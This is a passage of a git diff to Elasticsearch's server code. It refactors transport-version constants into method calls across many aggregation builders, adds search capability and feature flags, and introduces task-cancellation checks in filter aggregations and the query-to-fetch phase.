*/ private static final String NESTED_RETRIEVER_INNER_HITS_SUPPORT = "nested_retriever_inner_hits_support"; /** Fixed the math in {@code moving_fn}'s {@code linearWeightedAvg}. */ @@ -52,6 +54,7 @@ private SearchCapabilities() {} private static final String SIGNIFICANT_TERMS_ON_NESTED_FIELDS = "significant_terms_on_nested_fields"; private static final String EXCLUDE_VECTORS_PARAM = "exclude_vectors_param"; private static final String DENSE_VECTOR_UPDATABLE_BBQ = "dense_vector_updatable_bbq"; + private static final String BUCKET_SCRIPT_PARENT_MULTI_BUCKET_ERROR = "bucket_script_parent_multi_bucket_error"; public static final Set CAPABILITIES; static { @@ -69,12 +72,14 @@ private SearchCapabilities() {} capabilities.add(MOVING_FN_RIGHT_MATH); capabilities.add(K_DEFAULT_TO_SIZE); capabilities.add(KQL_QUERY_SUPPORTED); + capabilities.add(KQL_QUERY_BOOLEAN_FIELD_QUERY_SUPPORTED); capabilities.add(HIGHLIGHT_MAX_ANALYZED_OFFSET_DEFAULT); capabilities.add(INDEX_SELECTOR_SYNTAX); capabilities.add(SIGNIFICANT_TERMS_BACKGROUND_FILTER_AS_SUB); capabilities.add(SIGNIFICANT_TERMS_ON_NESTED_FIELDS); capabilities.add(EXCLUDE_VECTORS_PARAM); capabilities.add(DENSE_VECTOR_UPDATABLE_BBQ); + capabilities.add(BUCKET_SCRIPT_PARENT_MULTI_BUCKET_ERROR); CAPABILITIES = Set.copyOf(capabilities); } } diff --git a/server/src/main/java/org/elasticsearch/script/ScriptMetadata.java b/server/src/main/java/org/elasticsearch/script/ScriptMetadata.java index 47d87191675f3..ef425b03b5f5a 100644 --- a/server/src/main/java/org/elasticsearch/script/ScriptMetadata.java +++ b/server/src/main/java/org/elasticsearch/script/ScriptMetadata.java @@ -12,7 +12,6 @@ import org.apache.logging.log4j.Logger; import org.elasticsearch.ResourceNotFoundException; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.cluster.ClusterState; import org.elasticsearch.cluster.Diff; import org.elasticsearch.cluster.DiffableUtils; @@ -131,7 +130,7 @@ public void writeTo(StreamOutput out) throws IOException { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.MINIMUM_COMPATIBLE; + return TransportVersion.minimumCompatible(); } } @@ -283,7 +282,7 @@ public String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.MINIMUM_COMPATIBLE; + return TransportVersion.minimumCompatible(); } @Override diff --git a/server/src/main/java/org/elasticsearch/search/SearchExtBuilder.java b/server/src/main/java/org/elasticsearch/search/SearchExtBuilder.java index 55ba94d97b03a..dd19aa73a2337 100644 --- a/server/src/main/java/org/elasticsearch/search/SearchExtBuilder.java +++ b/server/src/main/java/org/elasticsearch/search/SearchExtBuilder.java @@ -10,7 +10,6 @@ package org.elasticsearch.search; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; import org.elasticsearch.common.io.stream.VersionedNamedWriteable; @@ -45,6 +44,6 @@ public abstract class SearchExtBuilder implements VersionedNamedWriteable, ToXCo @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/server/src/main/java/org/elasticsearch/search/SearchFeatures.java b/server/src/main/java/org/elasticsearch/search/SearchFeatures.java index 0c2f7c2aa625b..80ccd4c188538 100644 --- 
a/server/src/main/java/org/elasticsearch/search/SearchFeatures.java +++ b/server/src/main/java/org/elasticsearch/search/SearchFeatures.java @@ -32,6 +32,7 @@ public Set getFeatures() { public static final NodeFeature INT_SORT_FOR_INT_SHORT_BYTE_FIELDS = new NodeFeature("search.sort.int_sort_for_int_short_byte_fields"); static final NodeFeature MULTI_MATCH_CHECKS_POSITIONS = new NodeFeature("search.multi.match.checks.positions"); public static final NodeFeature BBQ_HNSW_DEFAULT_INDEXING = new NodeFeature("search.vectors.mappers.default_bbq_hnsw"); + public static final NodeFeature SEARCH_WITH_NO_DIMENSIONS_BUGFIX = new NodeFeature("search.vectors.no_dimensions_bugfix"); @Override public Set getTestFeatures() { @@ -41,7 +42,8 @@ public Set getTestFeatures() { RESCORER_MISSING_FIELD_BAD_REQUEST, INT_SORT_FOR_INT_SHORT_BYTE_FIELDS, MULTI_MATCH_CHECKS_POSITIONS, - BBQ_HNSW_DEFAULT_INDEXING + BBQ_HNSW_DEFAULT_INDEXING, + SEARCH_WITH_NO_DIMENSIONS_BUGFIX ); } } diff --git a/server/src/main/java/org/elasticsearch/search/SearchService.java b/server/src/main/java/org/elasticsearch/search/SearchService.java index d485b53e7e409..e29cb4f87fc76 100644 --- a/server/src/main/java/org/elasticsearch/search/SearchService.java +++ b/server/src/main/java/org/elasticsearch/search/SearchService.java @@ -889,6 +889,17 @@ private SearchPhaseResult executeQueryPhase(ShardSearchRequest request, Cancella } if (request.numberOfShards() == 1 && (request.source() == null || request.source().rankBuilder() == null)) { // we already have query results, but we can run fetch at the same time + // in this case we reuse the search context across search and fetch phase, hence we need to clear the cancellation + // checks that were applied by the query phase before running fetch. Note that the timeout checks are not applied + // to the fetch phase, while the cancellation checks are. 
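+ // Without this reset, fetch would keep running the timeout checks registered for the query phase; only the task-cancellation hook is re-registered below (when low-level cancellation is enabled), so a cancelled task can still abort the fetch promptly.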
+ context.searcher().clearQueryCancellations(); + if (context.lowLevelCancellation()) { + context.searcher().addQueryCancellation(() -> { + if (task != null) { + task.ensureNotCancelled(); + } + }); + } context.addFetchResult(); return executeFetchPhase(readerContext, context, afterQueryTime); } else { diff --git a/server/src/main/java/org/elasticsearch/search/aggregations/bucket/composite/CompositeAggregationBuilder.java b/server/src/main/java/org/elasticsearch/search/aggregations/bucket/composite/CompositeAggregationBuilder.java index ba00e3696d381..4bf4874241048 100644 --- a/server/src/main/java/org/elasticsearch/search/aggregations/bucket/composite/CompositeAggregationBuilder.java +++ b/server/src/main/java/org/elasticsearch/search/aggregations/bucket/composite/CompositeAggregationBuilder.java @@ -10,7 +10,6 @@ package org.elasticsearch.search.aggregations.bucket.composite; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; import org.elasticsearch.index.mapper.TimeSeriesIdFieldMapper.TimeSeriesIdFieldType; @@ -306,7 +305,7 @@ public boolean equals(Object obj) { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } @Override diff --git a/server/src/main/java/org/elasticsearch/search/aggregations/bucket/filter/FilterAggregationBuilder.java b/server/src/main/java/org/elasticsearch/search/aggregations/bucket/filter/FilterAggregationBuilder.java index 9e20429a147f5..5bc7692969e00 100644 --- a/server/src/main/java/org/elasticsearch/search/aggregations/bucket/filter/FilterAggregationBuilder.java +++ b/server/src/main/java/org/elasticsearch/search/aggregations/bucket/filter/FilterAggregationBuilder.java @@ -10,7 +10,6 @@ package org.elasticsearch.search.aggregations.bucket.filter; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; import org.elasticsearch.index.query.QueryBuilder; @@ -154,7 +153,7 @@ public QueryBuilder getFilter() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } public static class FilterAggregatorFactory extends AggregatorFactory { diff --git a/server/src/main/java/org/elasticsearch/search/aggregations/bucket/filter/FilterByFilterAggregator.java b/server/src/main/java/org/elasticsearch/search/aggregations/bucket/filter/FilterByFilterAggregator.java index cc8ecc74b5ea0..dd6470146f744 100644 --- a/server/src/main/java/org/elasticsearch/search/aggregations/bucket/filter/FilterByFilterAggregator.java +++ b/server/src/main/java/org/elasticsearch/search/aggregations/bucket/filter/FilterByFilterAggregator.java @@ -23,6 +23,7 @@ import org.elasticsearch.search.aggregations.LeafBucketCollector; import org.elasticsearch.search.aggregations.support.AggregationContext; import org.elasticsearch.search.runtime.AbstractScriptFieldQuery; +import org.elasticsearch.tasks.TaskCancelledException; import java.io.IOException; import java.util.ArrayList; @@ -268,7 +269,7 @@ protected LeafBucketCollector getLeafCollector(AggregationExecutionContext aggCt private void collectCount(LeafReaderContext ctx, Bits live) throws IOException { Counter counter = new Counter(docCountProvider); for (int filterOrd = 0; filterOrd < filters().size(); 
filterOrd++) { - incrementBucketDocCount(filterOrd, filters().get(filterOrd).count(ctx, counter, live)); + incrementBucketDocCount(filterOrd, filters().get(filterOrd).count(ctx, counter, live, this::checkCancelled)); } } @@ -306,11 +307,17 @@ public void setScorer(Scorable scorer) {} MatchCollector collector = new MatchCollector(); // create the buckets so we can call collectExistingBucket grow(filters().size() + 1); - filters().get(0).collect(aggCtx.getLeafReaderContext(), collector, live); + filters().get(0).collect(aggCtx.getLeafReaderContext(), collector, live, this::checkCancelled); for (int filterOrd = 1; filterOrd < filters().size(); filterOrd++) { collector.subCollector = collectableSubAggregators.getLeafCollector(aggCtx); collector.filterOrd = filterOrd; - filters().get(filterOrd).collect(aggCtx.getLeafReaderContext(), collector, live); + filters().get(filterOrd).collect(aggCtx.getLeafReaderContext(), collector, live, this::checkCancelled); + } + } + + private void checkCancelled() { + if (context.isCancelled()) { + throw new TaskCancelledException("cancelled"); } } diff --git a/server/src/main/java/org/elasticsearch/search/aggregations/bucket/filter/FiltersAggregationBuilder.java b/server/src/main/java/org/elasticsearch/search/aggregations/bucket/filter/FiltersAggregationBuilder.java index 6b3e0743dfdb0..84e25c1e3dd10 100644 --- a/server/src/main/java/org/elasticsearch/search/aggregations/bucket/filter/FiltersAggregationBuilder.java +++ b/server/src/main/java/org/elasticsearch/search/aggregations/bucket/filter/FiltersAggregationBuilder.java @@ -394,6 +394,6 @@ public String getType() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/server/src/main/java/org/elasticsearch/search/aggregations/bucket/filter/QueryToFilterAdapter.java b/server/src/main/java/org/elasticsearch/search/aggregations/bucket/filter/QueryToFilterAdapter.java index e8e33655d47c1..9c6f7ddd6cc02 100644 --- a/server/src/main/java/org/elasticsearch/search/aggregations/bucket/filter/QueryToFilterAdapter.java +++ b/server/src/main/java/org/elasticsearch/search/aggregations/bucket/filter/QueryToFilterAdapter.java @@ -29,6 +29,7 @@ import org.apache.lucene.util.Bits; import org.elasticsearch.common.io.stream.StreamOutput; import org.elasticsearch.search.aggregations.Aggregator; +import org.elasticsearch.search.internal.CancellableBulkScorer; import org.elasticsearch.xcontent.XContentBuilder; import java.io.IOException; @@ -192,7 +193,7 @@ Scorer randomAccessScorer(LeafReaderContext ctx) throws IOException { /** * Count the number of documents that match this filter in a leaf. */ - long count(LeafReaderContext ctx, FiltersAggregator.Counter counter, Bits live) throws IOException { + long count(LeafReaderContext ctx, FiltersAggregator.Counter counter, Bits live, Runnable checkCancelled) throws IOException { /* * weight().count will return the count of matches for ctx if it can do * so in constant time, otherwise -1. The Weight is responsible for @@ -216,20 +217,22 @@ long count(LeafReaderContext ctx, FiltersAggregator.Counter counter, Bits live) // No hits in this segment. return 0; } - scorer.score(counter, live, 0, DocIdSetIterator.NO_MORE_DOCS); + CancellableBulkScorer cancellableScorer = new CancellableBulkScorer(scorer, checkCancelled); + cancellableScorer.score(counter, live, 0, DocIdSetIterator.NO_MORE_DOCS); return counter.readAndReset(ctx); } /** * Collect all documents that match this filter in this leaf. 
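* The new {@code checkCancelled} hook is invoked between scoring windows (via {@code CancellableBulkScorer}), letting a long-running filters aggregation abort promptly once its parent search task is cancelled.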
*/ - void collect(LeafReaderContext ctx, LeafCollector collector, Bits live) throws IOException { + void collect(LeafReaderContext ctx, LeafCollector collector, Bits live, Runnable checkCancelled) throws IOException { BulkScorer scorer = weight().bulkScorer(ctx); if (scorer == null) { // No hits in this segment. return; } - scorer.score(collector, live, 0, DocIdSetIterator.NO_MORE_DOCS); + CancellableBulkScorer cancellableScorer = new CancellableBulkScorer(scorer, checkCancelled); + cancellableScorer.score(collector, live, 0, DocIdSetIterator.NO_MORE_DOCS); } /** diff --git a/server/src/main/java/org/elasticsearch/search/aggregations/bucket/geogrid/GeoHashGridAggregationBuilder.java b/server/src/main/java/org/elasticsearch/search/aggregations/bucket/geogrid/GeoHashGridAggregationBuilder.java index cbdae7cf3256b..76538aaeb997d 100644 --- a/server/src/main/java/org/elasticsearch/search/aggregations/bucket/geogrid/GeoHashGridAggregationBuilder.java +++ b/server/src/main/java/org/elasticsearch/search/aggregations/bucket/geogrid/GeoHashGridAggregationBuilder.java @@ -10,7 +10,6 @@ package org.elasticsearch.search.aggregations.bucket.geogrid; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.geo.GeoBoundingBox; import org.elasticsearch.common.geo.GeoUtils; import org.elasticsearch.common.io.stream.StreamInput; @@ -113,6 +112,6 @@ public String getType() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/server/src/main/java/org/elasticsearch/search/aggregations/bucket/geogrid/GeoTileGridAggregationBuilder.java b/server/src/main/java/org/elasticsearch/search/aggregations/bucket/geogrid/GeoTileGridAggregationBuilder.java index 2219c1d9da4ab..d3dca2b689c4e 100644 --- a/server/src/main/java/org/elasticsearch/search/aggregations/bucket/geogrid/GeoTileGridAggregationBuilder.java +++ b/server/src/main/java/org/elasticsearch/search/aggregations/bucket/geogrid/GeoTileGridAggregationBuilder.java @@ -10,7 +10,6 @@ package org.elasticsearch.search.aggregations.bucket.geogrid; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.geo.GeoBoundingBox; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.search.aggregations.AggregationBuilder; @@ -109,6 +108,6 @@ public String getType() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/server/src/main/java/org/elasticsearch/search/aggregations/bucket/global/GlobalAggregationBuilder.java b/server/src/main/java/org/elasticsearch/search/aggregations/bucket/global/GlobalAggregationBuilder.java index a28803f042381..bff032c7a75e8 100644 --- a/server/src/main/java/org/elasticsearch/search/aggregations/bucket/global/GlobalAggregationBuilder.java +++ b/server/src/main/java/org/elasticsearch/search/aggregations/bucket/global/GlobalAggregationBuilder.java @@ -10,7 +10,6 @@ package org.elasticsearch.search.aggregations.bucket.global; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; import org.elasticsearch.search.aggregations.AbstractAggregationBuilder; @@ -82,6 +81,6 @@ public String getType() { @Override public TransportVersion getMinimalSupportedVersion() { - return 
TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/server/src/main/java/org/elasticsearch/search/aggregations/bucket/histogram/DateHistogramAggregationBuilder.java b/server/src/main/java/org/elasticsearch/search/aggregations/bucket/histogram/DateHistogramAggregationBuilder.java index 4a6b6ca1c7b8b..5c8bf62ab2d34 100644 --- a/server/src/main/java/org/elasticsearch/search/aggregations/bucket/histogram/DateHistogramAggregationBuilder.java +++ b/server/src/main/java/org/elasticsearch/search/aggregations/bucket/histogram/DateHistogramAggregationBuilder.java @@ -10,7 +10,6 @@ package org.elasticsearch.search.aggregations.bucket.histogram; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.Rounding; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; @@ -535,7 +534,7 @@ public boolean equals(Object obj) { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } @Override diff --git a/server/src/main/java/org/elasticsearch/search/aggregations/bucket/histogram/HistogramAggregationBuilder.java b/server/src/main/java/org/elasticsearch/search/aggregations/bucket/histogram/HistogramAggregationBuilder.java index 6d0e63831ccbd..e02a90f040d3e 100644 --- a/server/src/main/java/org/elasticsearch/search/aggregations/bucket/histogram/HistogramAggregationBuilder.java +++ b/server/src/main/java/org/elasticsearch/search/aggregations/bucket/histogram/HistogramAggregationBuilder.java @@ -10,7 +10,6 @@ package org.elasticsearch.search.aggregations.bucket.histogram; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; import org.elasticsearch.search.aggregations.AggregationBuilder; @@ -405,7 +404,7 @@ public boolean equals(Object obj) { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } @Override diff --git a/server/src/main/java/org/elasticsearch/search/aggregations/bucket/histogram/VariableWidthHistogramAggregationBuilder.java b/server/src/main/java/org/elasticsearch/search/aggregations/bucket/histogram/VariableWidthHistogramAggregationBuilder.java index 06aaf9d365e0a..893ca412f29f2 100644 --- a/server/src/main/java/org/elasticsearch/search/aggregations/bucket/histogram/VariableWidthHistogramAggregationBuilder.java +++ b/server/src/main/java/org/elasticsearch/search/aggregations/bucket/histogram/VariableWidthHistogramAggregationBuilder.java @@ -10,7 +10,6 @@ package org.elasticsearch.search.aggregations.bucket.histogram; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; import org.elasticsearch.common.settings.Settings; @@ -235,6 +234,6 @@ public String getType() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/server/src/main/java/org/elasticsearch/search/aggregations/bucket/missing/MissingAggregationBuilder.java b/server/src/main/java/org/elasticsearch/search/aggregations/bucket/missing/MissingAggregationBuilder.java index 54a7af743c7ca..75a5e0496c0b6 100644 --- 
a/server/src/main/java/org/elasticsearch/search/aggregations/bucket/missing/MissingAggregationBuilder.java +++ b/server/src/main/java/org/elasticsearch/search/aggregations/bucket/missing/MissingAggregationBuilder.java @@ -10,7 +10,6 @@ package org.elasticsearch.search.aggregations.bucket.missing; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; import org.elasticsearch.search.aggregations.AggregationBuilder; @@ -117,6 +116,6 @@ public String getType() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/server/src/main/java/org/elasticsearch/search/aggregations/bucket/nested/NestedAggregationBuilder.java b/server/src/main/java/org/elasticsearch/search/aggregations/bucket/nested/NestedAggregationBuilder.java index 5e0e730387660..dd776c9411d4a 100644 --- a/server/src/main/java/org/elasticsearch/search/aggregations/bucket/nested/NestedAggregationBuilder.java +++ b/server/src/main/java/org/elasticsearch/search/aggregations/bucket/nested/NestedAggregationBuilder.java @@ -10,7 +10,6 @@ package org.elasticsearch.search.aggregations.bucket.nested; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.ParsingException; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; @@ -151,6 +150,6 @@ public String getType() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/server/src/main/java/org/elasticsearch/search/aggregations/bucket/nested/ReverseNestedAggregationBuilder.java b/server/src/main/java/org/elasticsearch/search/aggregations/bucket/nested/ReverseNestedAggregationBuilder.java index a515b0ecdac13..3d10e03ce9c0c 100644 --- a/server/src/main/java/org/elasticsearch/search/aggregations/bucket/nested/ReverseNestedAggregationBuilder.java +++ b/server/src/main/java/org/elasticsearch/search/aggregations/bucket/nested/ReverseNestedAggregationBuilder.java @@ -10,7 +10,6 @@ package org.elasticsearch.search.aggregations.bucket.nested; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.ParsingException; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; @@ -172,6 +171,6 @@ public String getType() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/server/src/main/java/org/elasticsearch/search/aggregations/bucket/range/DateRangeAggregationBuilder.java b/server/src/main/java/org/elasticsearch/search/aggregations/bucket/range/DateRangeAggregationBuilder.java index ff4693c482469..16b2c5bf87c25 100644 --- a/server/src/main/java/org/elasticsearch/search/aggregations/bucket/range/DateRangeAggregationBuilder.java +++ b/server/src/main/java/org/elasticsearch/search/aggregations/bucket/range/DateRangeAggregationBuilder.java @@ -10,7 +10,6 @@ package org.elasticsearch.search.aggregations.bucket.range; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.logging.DeprecationCategory; import 
org.elasticsearch.common.logging.DeprecationLogger; @@ -127,7 +126,7 @@ public String getType() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } @Override diff --git a/server/src/main/java/org/elasticsearch/search/aggregations/bucket/range/GeoDistanceAggregationBuilder.java b/server/src/main/java/org/elasticsearch/search/aggregations/bucket/range/GeoDistanceAggregationBuilder.java index d20f768bedb43..157d71448a59a 100644 --- a/server/src/main/java/org/elasticsearch/search/aggregations/bucket/range/GeoDistanceAggregationBuilder.java +++ b/server/src/main/java/org/elasticsearch/search/aggregations/bucket/range/GeoDistanceAggregationBuilder.java @@ -10,7 +10,6 @@ package org.elasticsearch.search.aggregations.bucket.range; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.ParsingException; import org.elasticsearch.common.geo.GeoDistance; import org.elasticsearch.common.geo.GeoPoint; @@ -489,7 +488,7 @@ public boolean equals(Object obj) { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/server/src/main/java/org/elasticsearch/search/aggregations/bucket/range/IpRangeAggregationBuilder.java b/server/src/main/java/org/elasticsearch/search/aggregations/bucket/range/IpRangeAggregationBuilder.java index ff684768b5c37..d1e74e5ef7a0f 100644 --- a/server/src/main/java/org/elasticsearch/search/aggregations/bucket/range/IpRangeAggregationBuilder.java +++ b/server/src/main/java/org/elasticsearch/search/aggregations/bucket/range/IpRangeAggregationBuilder.java @@ -11,7 +11,6 @@ import org.apache.lucene.document.InetAddressPoint; import org.apache.lucene.util.BytesRef; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.ParsingException; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; @@ -403,6 +402,6 @@ public boolean equals(Object obj) { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/server/src/main/java/org/elasticsearch/search/aggregations/bucket/range/RangeAggregationBuilder.java b/server/src/main/java/org/elasticsearch/search/aggregations/bucket/range/RangeAggregationBuilder.java index 28583cc961078..0e21f4c024e4b 100644 --- a/server/src/main/java/org/elasticsearch/search/aggregations/bucket/range/RangeAggregationBuilder.java +++ b/server/src/main/java/org/elasticsearch/search/aggregations/bucket/range/RangeAggregationBuilder.java @@ -10,7 +10,6 @@ package org.elasticsearch.search.aggregations.bucket.range; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.search.DocValueFormat; import org.elasticsearch.search.aggregations.AggregationBuilder; @@ -201,6 +200,6 @@ public String getType() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/server/src/main/java/org/elasticsearch/search/aggregations/bucket/sampler/DiversifiedAggregationBuilder.java b/server/src/main/java/org/elasticsearch/search/aggregations/bucket/sampler/DiversifiedAggregationBuilder.java index 0ef3af8a9718b..c09e0f3b91ccb 100644 --- 
a/server/src/main/java/org/elasticsearch/search/aggregations/bucket/sampler/DiversifiedAggregationBuilder.java +++ b/server/src/main/java/org/elasticsearch/search/aggregations/bucket/sampler/DiversifiedAggregationBuilder.java @@ -10,7 +10,6 @@ package org.elasticsearch.search.aggregations.bucket.sampler; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; import org.elasticsearch.search.aggregations.AggregationBuilder; @@ -189,7 +188,7 @@ public String getType() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } @Override diff --git a/server/src/main/java/org/elasticsearch/search/aggregations/bucket/sampler/SamplerAggregationBuilder.java b/server/src/main/java/org/elasticsearch/search/aggregations/bucket/sampler/SamplerAggregationBuilder.java index 871c9f3a2ff7f..f21d8988efcaa 100644 --- a/server/src/main/java/org/elasticsearch/search/aggregations/bucket/sampler/SamplerAggregationBuilder.java +++ b/server/src/main/java/org/elasticsearch/search/aggregations/bucket/sampler/SamplerAggregationBuilder.java @@ -10,7 +10,6 @@ package org.elasticsearch.search.aggregations.bucket.sampler; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.ParsingException; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; @@ -141,7 +140,7 @@ public String getType() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } @Override diff --git a/server/src/main/java/org/elasticsearch/search/aggregations/bucket/terms/RareTermsAggregationBuilder.java b/server/src/main/java/org/elasticsearch/search/aggregations/bucket/terms/RareTermsAggregationBuilder.java index 25c1486e10ce0..f1e02d4bff8b8 100644 --- a/server/src/main/java/org/elasticsearch/search/aggregations/bucket/terms/RareTermsAggregationBuilder.java +++ b/server/src/main/java/org/elasticsearch/search/aggregations/bucket/terms/RareTermsAggregationBuilder.java @@ -9,7 +9,6 @@ package org.elasticsearch.search.aggregations.bucket.terms; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; import org.elasticsearch.search.aggregations.AggregationBuilder; @@ -240,6 +239,6 @@ public String getType() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/server/src/main/java/org/elasticsearch/search/aggregations/bucket/terms/SignificantTermsAggregationBuilder.java b/server/src/main/java/org/elasticsearch/search/aggregations/bucket/terms/SignificantTermsAggregationBuilder.java index cc74cba1e2d8a..58cfc5cbd113c 100644 --- a/server/src/main/java/org/elasticsearch/search/aggregations/bucket/terms/SignificantTermsAggregationBuilder.java +++ b/server/src/main/java/org/elasticsearch/search/aggregations/bucket/terms/SignificantTermsAggregationBuilder.java @@ -9,7 +9,6 @@ package org.elasticsearch.search.aggregations.bucket.terms; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.io.stream.StreamInput; import 
org.elasticsearch.common.io.stream.StreamOutput; import org.elasticsearch.index.query.QueryBuilder; @@ -370,6 +369,6 @@ public String getType() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/server/src/main/java/org/elasticsearch/search/aggregations/bucket/terms/SignificantTextAggregationBuilder.java b/server/src/main/java/org/elasticsearch/search/aggregations/bucket/terms/SignificantTextAggregationBuilder.java index 449a189e9aa39..1c4d2cf02117e 100644 --- a/server/src/main/java/org/elasticsearch/search/aggregations/bucket/terms/SignificantTextAggregationBuilder.java +++ b/server/src/main/java/org/elasticsearch/search/aggregations/bucket/terms/SignificantTextAggregationBuilder.java @@ -10,7 +10,6 @@ package org.elasticsearch.search.aggregations.bucket.terms; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; import org.elasticsearch.index.query.AbstractQueryBuilder; @@ -377,6 +376,6 @@ public String getType() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/server/src/main/java/org/elasticsearch/search/aggregations/bucket/terms/TermsAggregationBuilder.java b/server/src/main/java/org/elasticsearch/search/aggregations/bucket/terms/TermsAggregationBuilder.java index bfd68752621dd..122c4736c5f26 100644 --- a/server/src/main/java/org/elasticsearch/search/aggregations/bucket/terms/TermsAggregationBuilder.java +++ b/server/src/main/java/org/elasticsearch/search/aggregations/bucket/terms/TermsAggregationBuilder.java @@ -497,6 +497,6 @@ public String getType() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/server/src/main/java/org/elasticsearch/search/aggregations/metrics/AvgAggregationBuilder.java b/server/src/main/java/org/elasticsearch/search/aggregations/metrics/AvgAggregationBuilder.java index bc5d8be385c27..bb02c42c94b90 100644 --- a/server/src/main/java/org/elasticsearch/search/aggregations/metrics/AvgAggregationBuilder.java +++ b/server/src/main/java/org/elasticsearch/search/aggregations/metrics/AvgAggregationBuilder.java @@ -10,7 +10,6 @@ package org.elasticsearch.search.aggregations.metrics; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; import org.elasticsearch.search.aggregations.AggregationBuilder; @@ -102,6 +101,6 @@ public String getType() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git 